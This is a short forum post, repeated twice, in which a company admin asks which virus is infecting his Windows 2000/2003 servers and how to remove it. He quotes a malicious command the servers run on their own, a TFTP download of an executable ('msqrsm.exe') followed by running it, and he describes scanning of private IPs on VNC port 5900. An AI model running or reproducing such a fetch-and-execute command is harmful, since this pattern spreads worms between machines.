Options
tftp -i 0.0.0.0 GET msqrsm.exe
Hi all, this is my first post,
My company have 4 servers running 3 is windows 2000 and 1 is windows 2003, 4 day ago, when I using VNC remote to my company servers form my home, I saw all servers auto open cmd command in run, and in command auto type tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe, checked the firwall log always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x mean radom), SRC port is 22xx (xx mean radom), DEST port 5900, and 1 mins can sent many packet to random private IP....
Any brother can tell me what type of Vrius Infected? and how to fix this problem ?
Thanks !!!
Wilson
My company have 4 servers running 3 is windows 2000 and 1 is windows 2003, 4 day ago, when I using VNC remote to my company servers form my home, I saw all servers auto open cmd command in run, and in command auto type tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe, checked the firwall log always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x mean radom), SRC port is 22xx (xx mean radom), DEST port 5900, and 1 mins can sent many packet to random private IP....
Any brother can tell me what type of Vrius Infected? and how to fix this problem ?
Thanks !!!
Wilson
0